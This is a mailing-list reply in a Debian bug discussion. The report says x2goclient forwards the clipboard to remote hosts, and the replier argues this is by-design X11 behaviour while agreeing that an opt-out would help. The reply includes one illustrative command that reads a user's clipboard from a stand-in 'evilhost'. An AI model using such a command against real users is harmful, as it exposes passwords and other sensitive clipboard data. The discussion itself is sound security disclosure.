On 13-07-01 04:56, Christoph Anton Mitterer <calestyo@scientia.net> wrote:
Package: x2goclient
Severity: grave
Tags: security
Hi.
From: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=714588
It seems that per default (and I even found no way to disable it) x2goclient (and perhaps other related tools?) transmits the content of the clipboard to the remote host.
Yes, other related tools like X11. x2go is basically just a faster version of the traditional xforwarding. In X11 every client can always access the clipboard/selection/etc., so you will also have the same security problems (by design). E.g. 'ssh -X user@evilhost "xclip -o"' demonstrates this.
As this may easily contain passwords or other sensitive information, this is an extremely critical hole.
I disagree, this is not a hole at all, it works as intended. It's just that users are often not educated about the implications of passing around passwords via the clipboard etc.
But I concur that the ability to switch off clipboard/selection/... forwarding in the x2goagent/x2goclient would be nice to have. Patches are of course always welcome.
Ciao,
Alexander Wuerstlein.